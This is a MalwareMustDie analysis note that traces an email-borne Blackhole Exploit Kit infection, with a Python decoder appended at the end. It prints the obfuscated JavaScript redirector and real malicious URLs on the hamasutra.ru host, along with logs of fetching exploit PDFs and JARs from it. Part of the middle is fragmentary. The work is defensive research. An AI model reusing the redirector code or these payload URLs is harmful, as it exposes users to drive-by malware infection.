======================================
#MalwareMustDie ; @unixfreaxjp ~]$ date
Thu Nov 22 17:27:12 JST 2012
The finding of the obfuscated version of PluginDetect 0.7.9
And a guide on how to decode it manually
WARNING: The urls in this note may infect your PC, do not attempt to click them
=======================================
I had reports on twitter of two infections by email attached with an obfuscated HTML infector, thanks to @KDPryor, as per the following pic snapshots;
https://twitter.com/MalwareMustDie/status/271104793567707137
https://twitter.com/MalwareMustDie/status/271439256264777728
-----------------------------------------------------------------------
//The attached HTML infector looks like this:
Please wait..

You will be forwarded... Please wait..

Internet Explorer and Mozilla Firefox compatible only


----------------------------------------------------------------
// contains the ↑obfuscated redirector by javascript:
// which can be decoded easily with the below methods....
// PS: The pic of this deobfuscation is in here: https://pbs.twimg.com/media/A8Mk_pOCYAEm_lL.jpg:large

try {
  if(window.document)window["doc"+"ument"]["body"]="vasasf"
} catch(bawetawe) {
  if(true) <========== // ^^^^^^^
  {
    v=1; <============== // ^^^^^^
    try { fawbe-- } catch(afnwenew) {
      try { (v+v)() } catch(gngrthn) {
        try { if(020===0x10)v["document"]["bo"+"dy"]="123" } catch(gfdnfdgber) {
          m=123;
          if("".substr)ev=eval;
        }
      }
      n=["4i","3m","4e","1o","2b","22","27","29","a","4i","3m","4e","20","2b","4i","3m","4e","1o","29","a","45","42","1f","4i","3m","4e","1o","2b","2b","4i","3m","4e","20","1g","17","4n","40","4b","3o","4h","49","41","4a","4g","1l","48","4b","3o","3m","4g","45","4b","4a","2b","19","44","4g","4g","4c","28","1m","1m","44","3m","49","3m","4f","4h","4g","4e","3m","1l","4e","4h","28","26","1n","26","1n","1m","42","4b","4e","4h","49","1m","48","45","4a","47","4f","1m","3o","4b","48","4h","49","4a","1l","4c","44","4c","19","29","50","a"];
      h=2;
      s="";
      if(m)for(i=0;i-106!=0;i++) {
        k=i;
        if(true)s+=String.fromCharCode(parseInt(n[i],25)); <======== // ^^^^^^^^
      }
      z=s;
      ev(""+z)
    }
  }
}
----------------output ↓-------------------
var1=49;
var2=var1;
if(var1==var2) {document.location="http://hamasutra.ru:8080/forum/links/column.php";}
---------------------------------------
// let's fetch to know the source...
//below is a successful attempt...
--12:43:04-- http://hamasutra.ru:8080/forum/links/column.php
=> `column.php'
Resolving hamasutra.ru... 216.24.196.66, 82.165.193.26, 202.180.221.186, ...
Connecting to hamasutra.ru|216.24.196.66|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
12:43:09 (106.64 KB/s) - `column.php' saved [92154]
// unsuccessful attempt is like below reference....
// so you must try again with the different IP/references
--12:43:26-- http://hamasutra.ru:8080/forum/links/column.php
=> `column.php.1'
Resolving hamasutra.ru... seconds 0.00, 216.24.196.66, 82.165.193.26, 202.180.221.186, ...
Caching hamasutra.ru => 216.24.196.66 82.165.193.26 202.180.221.186 203.80.16.81
Connecting to hamasutra.ru|216.24.196.66|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5560 (new refcount 1).
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 502 Bad Gateway
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 03:43:22 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive

// This is the file fetched...
// @unixfreaxjp /malware]$ date
Thu Nov 22 12:47:02 JST 2012
@unixfreaxjp /malware]$ ls -alF
-rwx------ 1 xxxx xxxx 92154 Nov 21 18:43 column.php*
// The inside of the fetched column.php as per below...
// It is obfuscated Plugindetect 0.7.9 <==== POINT!
0)s=s.concat(ss(p(a.substr(i,2),23)-1));
}
c=s;
try{window.document.body=p}catch(egewg){e(""+c)}}
-----------------------------------------------------------------------------
// IS this really a BHEK2?
// try to fetch t.pdf & jars...
// with the current settings...
--cookies (cookies) to on
--keep-session-cookies (keepsessioncookies) to 1
--save-cookies (savecookies) to mycookies.txt
--user-agent (useragent) to MalwareMustDie is banging on your Door
--referer (referer) to http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
// this is url referer of one of the spam emails
// get t.pdf
--12:58:25-- http://hamasutra.ru:8080/forum/data/t.pdf
Resolving hamasutra.ru... seconds 0.00, 203.80.16.81, 216.24.196.66, 82.165.193.26, ...
Caching hamasutra.ru => 203.80.16.81 216.24.196.66 82.165.193.26 202.180.221.186
Connecting to hamasutra.ru|203.80.16.81|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5528 (new refcount 1).
---request begin---
GET /forum/data/t.pdf HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 12:21:44 GMT
Content-Type: application/pdf
Connection: keep-alive
Last-Modified: Fri, 14 Sep 2012 18:03:02 GMT
ETag: "13500e4-1fa7-4c9ad3c1e8180"
Accept-Ranges: bytes
Content-Length: 8103
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 8,103 (7.9K) [application/pdf]
12:58:27 (79.24 KB/s) - `t.pdf' saved [8103/8103]
// get spn.jar
---request begin---
GET /forum/data/spn.jar HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 04:00:25 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Wed, 21 Nov 2012 16:11:12 GMT
ETag: "1350002-32c4-4cf0399618800"
Accept-Ranges: bytes
Content-Length: 12996
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 12,996 (13K) [application/java-archive]
13:00:31 (85.16 KB/s) - `spn.jar' saved [12996/12996]
// get spn2.jar
---request begin---
GET /forum/data/spn2.jar HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 04:02:30 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Wed, 21 Nov 2012 16:11:12 GMT
ETag: "1350003-4fb8-4cf0399618800"
Accept-Ranges: bytes
Content-Length: 20408
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 20,408 (20K) [application/java-archive]
3:02:35 (73.93 KB/s) - `spn2.jar' saved [20408/20408]
// get spn3.jar
---request begin---
GET /forum/data/spn3.jar HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Thu, 22 Nov 2012 04:01:38 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Mon, 22 Oct 2012 13:35:13 GMT
ETag: "1350005-521e-4cca5ec4d4640"
Accept-Ranges: bytes
Content-Length: 21022
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,022 (21K) [application/java-archive]
13:03:43 (31.58 KB/s) - `spn3.jar' saved [21022/21022]
// Let's test whether this is not CoolEK or other EK by testing
// special function of BHEK PluginDetect 0.7.9 = getJavaInfo.jar
// lets fetch the getJavaInfo.jar
---request begin---
GET /forum/data/getJavaInfo.jar HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Thu, 22 Nov 2012 04:08:27 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Wed, 21 Nov 2012 16:11:12 GMT
ETag: "13504e0-24b-4cf0399618800"
Accept-Ranges: bytes
Content-Length: 587
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 587 [application/java-archive]
13:10:30 (17.13 MB/s) - `getJavaInfo.jar' saved [587/587]
------------------------------------------------------------------------
// back to the evil script of column.php..
// let's make it beautiful to read...
//↑oh, at the bottom there's a direct download url...
// looks like a pdf download to me..,
// let's assemble the army! no, ...assemble the url↓
..blah..../forum/links/column.php?hdf=30:1n:1i:1i:33&puihqtt=b&hdmk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pgrzxii=1f:1d:1f:1d:1f:1d:1f
--------------------------------------------------
// Let's fetch this file....
Resolving hamasutra.ru... seconds 0.00, 82.165.193.26, 202.180.221.186, 203.80.16.81, ...
Caching hamasutra.ru => 82.165.193.26 202.180.221.186 203.80.16.81 216.24.196.66
Connecting to hamasutra.ru|82.165.193.26|:8080... seconds 0.00, connected.
Created socket 1896.
---request begin---
GET //forum/links/column.php?hdf=30:1n:1i:1i:33&puihqtt=b&hdmk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pgrzxii=1f:1d:1f:1d:1f:1d:1f HTTP/1.0
Referer: http://www.ups.com/?Site=Corporate&cookie=am_en_home_none
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: hamasutra.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Thu, 22 Nov 2012 05:35:20 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Accept-Ranges: bytes
Content-Length: 14749
Content-Disposition: inline; filename=1ed92.pdf
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 14,749 (14K) [application/pdf]
13:40:29 (23.61 KB/s) - `column.php@hdf=30%3A1n%3A1i%3A1i%3A33&puihqtt=b&hdmk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pgrzxii=1f%3A1d%3A1f%3A1d%3A1f%3A1d%3A1f' saved [14749/14749]
// let's rename the long filename into a short one...
// called it infector.pdf
------------------------------------------
// OK we got the many samples..
// We proved it was BHEK2,
// We go back to the rest of the garbled code column.php.....
// we all want to see whether the PluginDetect 0.7.9 is really obfuscated or not, do we?
// OK, let's strip the html code EXCEPT the tags with values....
// To make it easier, let's see the structure of this code first...
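// Added example (not part of the original note, and not MalwareMustDie's tooling): a static Python decoder for the redirector shown at the top of this note. The first stage turns each token of the n=[...] array into one character with parseInt(token, 25); the column.php wrapper does the same thing with two-character chunks in base 23 minus 1 (the `p(a.substr(i,2),23)-1` fragment above). Both are handled by one pair of functions below, so the output can be read without ever calling eval. The token array is copied from the note; `encode_chunked` and the sample string it round-trips are constructed here for the self-check only, they are not from the kit.

```python
import re

# Base-25 tokens copied verbatim from the n=[...] array of the redirector in the note.
REDIRECTOR_TOKENS = [
    "4i","3m","4e","1o","2b","22","27","29","a","4i","3m","4e","20","2b","4i","3m","4e",
    "1o","29","a","45","42","1f","4i","3m","4e","1o","2b","2b","4i","3m","4e","20","1g",
    "17","4n","40","4b","3o","4h","49","41","4a","4g","1l","48","4b","3o","3m","4g","45",
    "4b","4a","2b","19","44","4g","4g","4c","28","1m","1m","44","3m","49","3m","4f","4h",
    "4g","4e","3m","1l","4e","4h","28","26","1n","26","1n","1m","42","4b","4e","4h","49",
    "1m","48","45","4a","47","4f","1m","3o","4b","48","4h","49","4a","1l","4c","44","4c",
    "19","29","50","a",
]


def decode_tokens(tokens, base, offset=0):
    """Mirror of the obfuscator's loop: every token is parseInt(token, base),
    optionally shifted by `offset`, and becomes one character. No eval involved."""
    return "".join(chr(int(tok, base) + offset) for tok in tokens)


def decode_chunked(blob, width, base, offset=0):
    """Variant used by the column.php wrapper: a single string cut into
    fixed-width pieces (a.substr(i,2) with base 23 and -1 in the note)."""
    chunks = [blob[i:i + width] for i in range(0, len(blob), width)]
    return decode_tokens(chunks, base, offset)


def encode_chunked(text, width, base, offset=0):
    """Inverse of decode_chunked. Constructed here only to build a round-trip
    self-check; it is not code from the exploit kit."""
    digits = "0123456789abcdefghijklmnopqrstuvwxyz"
    out = []
    for ch in text:
        v = ord(ch) - offset          # undo the shift the decoder applies
        s = ""
        while v:
            s = digits[v % base] + s
            v //= base
        out.append(s.rjust(width, "0"))
    return "".join(out)


# Pull the landing URL out of the decoded stage so it can go straight into a blocklist/IOC note.
REDIRECT_RE = re.compile(r'document\.location\s*=\s*"([^"]+)"')


def extract_redirect(script):
    """Return the document.location target from a decoded redirector, or None."""
    m = REDIRECT_RE.search(script)
    return m.group(1) if m else None


if __name__ == "__main__":
    stage2 = decode_tokens(REDIRECTOR_TOKENS, 25)
    print(stage2)                                   # the three lines shown under "output" in the note
    print("redirect target:", extract_redirect(stage2))
    # round-trip of the column.php scheme on a constructed sample string
    sample = "var1=49;"
    assert decode_chunked(encode_chunked(sample, 2, 23, -1), 2, 23, -1) == sample
```

Running the block prints the same `var1=49; var2=var1; if(var1==var2) {document.location=...}` text that the note obtained by running the script in a browser, which is the point: for this family the decoder is only `parseInt` over a fixed-base alphabet, so the landing URL can be recovered offline and with no JavaScript engine in the loop. Changing `base`, `width` and `offset` is all that is needed when a later sample swaps the alphabet, as the column.php stage already does.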